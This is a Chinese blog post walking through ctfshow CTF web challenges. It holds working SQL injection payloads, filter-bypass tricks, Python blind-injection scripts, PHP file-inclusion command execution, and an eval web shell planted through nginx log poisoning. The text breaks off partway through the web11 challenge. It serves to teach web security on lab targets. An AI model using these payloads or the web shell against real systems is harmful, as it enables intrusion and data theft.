ctfshow-WEB-未分类-wp

最新推荐文章于 2024-08-16 15:00:00 发布
最新推荐文章于 2024-08-16 15:00:00 发布
阅读量258 收藏
点赞数
分类专栏: wp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mmmjjjjjj1996/article/details/126898568
版权
这篇博客详细介绍了CTFShow中关于WEB安全的一系列挑战,包括源代码泄露、SQL注入、文件包含、命令执行、逻辑漏洞等多个方面。作者通过分析题目提供的源代码和提示,逐步揭示了解题思路和利用方法,如利用base64解密、绕过空格过滤、布尔盲注、PHP伪协议等技巧。此外,还涉及了Cookie与SESSION的利用、文件MD5碰撞、代码执行等知识点,适合对WEB安全感兴趣的读者学习。
摘要由CSDN通过智能技术生成

文章目录

WEB

无类别

web签到题:源代码+base64

这一关的flag藏在注释中,base64解密即可得到flag

web2:最普通sql注入

SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可

username=admin' or 1=1#&password=123 显示登陆成功存在注入

username=admin' or 1=1 order by 3#&password=123 回显正常
username=admin' or 1=1 order by 4#&password=123 回显异常

username=admin' or 1=1 union select 1,2,3#&password=123 2可以回显在页面上

username=admin' or 1=1 union select 1,database(),3#&password=123 库名为web2
username=admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#&password=123 表名为flag和user
username=admin' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="flag"#&password=123 flag表存在flag字段

username=admin' or 1=1 union select 1,flag,3 from flag#&password=123 得到flag

web3:php伪协议文件包含

文件包含漏洞,include()函数包含的文件会被执行,使用PHP伪协议配合抓包工具进行命令执行

php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效

提示了: <?php include($_GET['url']);?> 

传参?url=php://input
post参数写入<?php system('ls')?>,就会被include当作php执行了

拿到回显ctf_go_go_go index.php 

post参数查看文件<?php system('cat ctf_go_go_go')?>得到flag

php伪协议读文件:php://filter/read=convert.base64-encode/resource=文件名

当enctype="multipart/form-data"时,php://input是无效的。

web4:日志写入一句话

文件包含漏洞,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell;然而这一关伪协议不起作用,我们可以通过日志注入进行任意命令执行,从而getshell

c与上题提示一致:<?php include($_GET['url']);?> 
本题可以访问nginx日志:?url=/var/log/nginx/access.log

172.12.0.6 - - [31/Aug/2022:14:01:28 +0000] "GET / HTTP/1.1" 200 715 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0"
172.12.0.6 - - [31/Aug/2022:14:01:53 +0000] "GET /?url=index.php HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0"

也就是说如果我们UA带上一句话也会写入日志中,并且因为include函数会强制使用php解析日志

重新抓包在UA中加上一句话:<?php @eval($_POST['a']);?>
然后蚁剑连接:http://05cc7d16-8718-4a15-9c1d-2331578c7921.challenge.ctf.show/?url=/var/log/nginx/access.log,密码为a即可

web5:0e开头的md5

需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过

0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag

打开看到源码提示:

<?php
    $flag="";
	$v1=$_GET['v1'];
	$v2=$_GET['v2'];
	if(isset($v1) && isset($v2)){
   
    	if(!ctype_alpha($v1)){
   
        	die("v1 error");
    	}
    	if(!is_numeric($v2)){
   
        	die("v2 error");
    	}
    	if(md5($v1)==md5($v2)){
   
        	echo $flag;
    	}
	}else{
   
    echo "where is flag?";
	}
?>

v1必须是纯字母,v2必须是纯数字,并且v1和v2的md5值要一样

PHP在处理哈希字符串时,它把每一个以"0e"开头的哈希值都解释为0,所以只有v1和v2哈希之后的值都是0e开头,两个等于号的php比较就被绕过了

常见md5后以0e开头的字符串:

QNKCDZO
240610708
byGcY
sonZ7y
s878926199a
s155964671a
s214587387a
s214587387a
s878926199a
s1091221200a
s1885207154a
s1502113478a
s1885207154a
s1836677006a
s155964671a
s1184209335a
s1665632922a
s1502113478a
s1836677006a
s1091221200a
s155964671a
s1502113478a
s155964671a
s1665632922a
s155964671a
s1091221200a
s1836677006a
s1885207154a
s532378020a
s878926199a
s1091221200a
s214587387a
s1502113478a
s1091221200a
s1665632922a
s1885207154a
s1836677006a
s1665632922a
s878926199a

补充:

var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2' =='1e3');
var_dump('0x1234Ab' == '1193131'); 
var_dump('0xABCdef' == '0xABCdef');

web6:过滤空格sql注入

SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过

当输入username=admin' or 1=1#&password=123时提示sql inject error,发现时kongge被过滤了

一般有以下几种绕过空格的方法

/**/
()
回车(url编码中的%0a)
换行符(url编码中的%09)
`(tap键上面的按钮)
tap
两个空格

此处我们使用/**/

然后根据web2中的payload,最终payload为:username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#&password=123

web7:整形联合查询sql注入

SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格

参考web2和web6

payload:/index.php?id=1/**/or/**/1=1/**/union/**/select/**/1,database(),3#

能联合查询直接搞,也有wp使用布尔盲注:

import requests
s=requests.session()
url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break

web8:整形布尔盲注sql注入

SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字

  • 过滤了空格,使用web6方法绕过
  • 过滤了and,可以使用or代替
  • 过滤了union,可以使用盲注(回显只有true和false)
  • 过滤了逗号,使用特殊语法如:substr(database(),1,1) ——> substr(database() from 1 for 1)limit 0,1 ——> limit 1 offset 0
id=-1 /**/or /**/1=1 返回全部结果,正确

id=-1/**/or/**/1=2 返回结果为空,错误,没有回显应该是盲注

编写盲注脚本

import requests
url='http://4dbdeaee-1caf-482b-a050-73f670e78d6d.challenge.ctf.show/index.php?id=-3' 
payload1=url+"/**/or/**/ascii(substr(database()/**/from/**/{}/**/for/**/1))={}"
payload2=url+"/**/or/**/ascii(substr((select(table_name)from/**/information_schema.tables/**/where/**/table_schema=\"web8\"limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
payload3=url+"/**/or/**/ascii(substr((select(column_name)from/**/information_schema.columns/**/where/**/table_name=\"flag\"limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
payload=url+"/**/or/**/ascii(substr((select(flag)from/**/flag/**/limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
flag=''
str='1234567890abcdefghijklmnopqrstuvwxyz-{}' # 或者使用range(31, 128):
for i in range(200):
    for j in str:
        res=requests.get(payload.format(i,ord(j)))
        if('If' in res.text):
            flag=flag+j
            print(flag)
            if(j=='}'):
                break

web9:源码泄露+md5sql注入

SQL注入漏洞, SQL中使用MD5进行加密, 推荐使用MD5加密漏洞绕过

扫到robots.txt,打开看到提示index.phps

<?php
    $flag="";
	$password=$_POST['password'];
	if(strlen($password)>10){
   
    	die("password error");
	}
	$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
	$result=mysqli_query($con,$sql);
	if(mysqli_num_rows($result)>0){
   
    	while($row=mysqli_fetch_assoc($result)){
   
        	echo "登陆成功<br>";
        	echo $flag;
    	}
	}
?>

语法:md5(string,raw)

string	必需。规定要计算的字符串。
raw	 可选

  TRUE - 原始 16 字符二进制格式
  FALSE - 默认。32 字符十六进制数

将密码转换成16进制的hex值以后,再将其转换成字符串后包含'or'xxx

提供一个字符串: ffifdyop

md5后,276f722736c95d99e921722cf9ed621c

再转成字符串: 'or'6<trach>

拼接入sql得到:select * from user where username ='admin' and password =''or'6<trach>'

其中'6<trash>'以6开头,非0,返回真,or就也返回真,and整个表达式为真

web10:group by with rollup sql注入

SQL注入漏洞, 审计代码可以发现源码中存在漏洞, 推荐使用with rollup注入进行绕过, 此关卡过滤了空格,and等关键字

  • 过滤空格, 可以使用括号()或者注释/**/绕过
  • 过滤and, 可以使用or来代替

同样index.phps泄露源码

<?php
	$flag="";
	function replaceSpecialChar($strParam){
   
		 $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
		 return preg_replace($regex,"",$strParam);
	}
	if (!$con)
	{
   
		die('Could not connect: ' . mysqli_error());
	}
	if(strlen($username)!=strlen(replaceSpecialChar($username))){
   
		die("sql inject error");
	}
	if(strlen($password)!=strlen(replaceSpecialChar($password))){
   
		die("sql inject error");
	}
	$sql="select * from user where username = '$username'";
	$result=mysqli_query($con,$sql);
		if(mysqli_num_rows($result)>0){
   
				while($row=mysqli_fetch_assoc($result)){
   
					if($password==$row['password']){
   
						echo "登陆成功<br>";
						echo $flag;
					}

				 }
		}
?>

使用group by之后,会按指定的列名去重,相同列名只显示其中一行

再加上with rollup 之后,最后会多一行该指定列为NULL的行

若本题输入的密码为NULL,mysqli_fetch_assoc按行匹配就一定会匹配上rollup多出来的这一行

故本题payload:username为admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#,password留空即可

web11:Cookie与SESSION

用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过

打开看到源码

<?php
	function replaceSpecialChar($strParam){
   
		$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
		return preg_replace
最低0.47元/天 解锁文章
陪你等待
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow-WEB-web3
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效 页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...
ctfshow-WEB-web8
热门推荐
wangyuxiang946的博客
09-05 2万+
ctf.show WEB模块第8关是一个SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字, 1. 过滤空格, 可以使用括号() 或者注释/**/ 绕过 2. 过滤and, 可以使用or替代 3. 过滤union, 可以用盲注替代联合注入 4. 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替 首先确定注入点, 输入...
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2281
CTFShow-WEB入门篇--信息搜集详细Wp
CTFShow-Web篇详细wp(持续更新中ing)
Aluxian_的博客
04-23 1109
【代码】CTFShow-Web篇详细wp
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1076
ctfshow-web入门-爆破wp
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1107
CTFshow-文件上传
2024年网络安全最全CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84254087的博客
05-01 805
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTFshow--web入门(171-184)
2402_82963715的博客
07-28 634
CTFshow--web入门171-184的wp
ctfshow-web入门-信息搜集wp
m0_53567065的博客
10-31 599
ctfshow-web入门-信息收集wp
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
wp-china-yes插件
12-03
**WP-China-Yes插件详解** 在WordPress的众多插件中,WP-China-Yes是一款针对中国用户特别设计的工具,旨在解决国内用户访问基于WordPress搭建的网站时速度慢的问题。这款插件通过优化资源加载、缓存策略以及采用...
wordpress之wp-settings.php
10-30
### WordPress之wp-settings.php #### 文件概述 `wp-settings.php`是WordPress系统中的核心文件之一,主要用于初始化WordPress环境,加载核心功能以及配置选项等。该文件位于WordPress根目录下,通常在用户访问...
wp-script-core
09-07
标签"wp-script-co"可能是一个简化的版本或者错误,完整的可能是"wp-script-core",用于标识与标题相关的关键词,帮助用户搜索和识别这个插件。在WordPress插件目录中,通常会用这样的标签来分类和组织插件。 **...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 689
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
Animetronic - hackmyvm
tanbinn的博客
08-12 476
hackmyvm的Animetronic靶场
网络协议八 网络安全相关
hunandede的博客
08-12 432
ARP欺骗的防护原理。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-16 768
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
ctfshow-__萌新隐写
09-14
根据引用中提到的内容,CTFShow "萌心区"WP详解(上)涉及了一些关于萌新认证的内容,其中包括了密码、隐写和杂项等方面的题目。而引用中提到,下载的文件是一个word文件,里面包含了一张图,并且提示说找到了FLAG。而引用中提到,萌新隐写题目可能是纯签到题,可以在公告中找到或者输入萌新码。根据这些信息,我们可以得出结论,ctfshow-__萌新隐写也是CTFShow "萌心区"WP详解(上)中关于隐写的一道题目。 请注意,我无法提供具体的题目内容和解答,因为您没有提供更多细节。如果您需要更详细的答案,请提供更多相关的信息,我将尽力帮助您解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值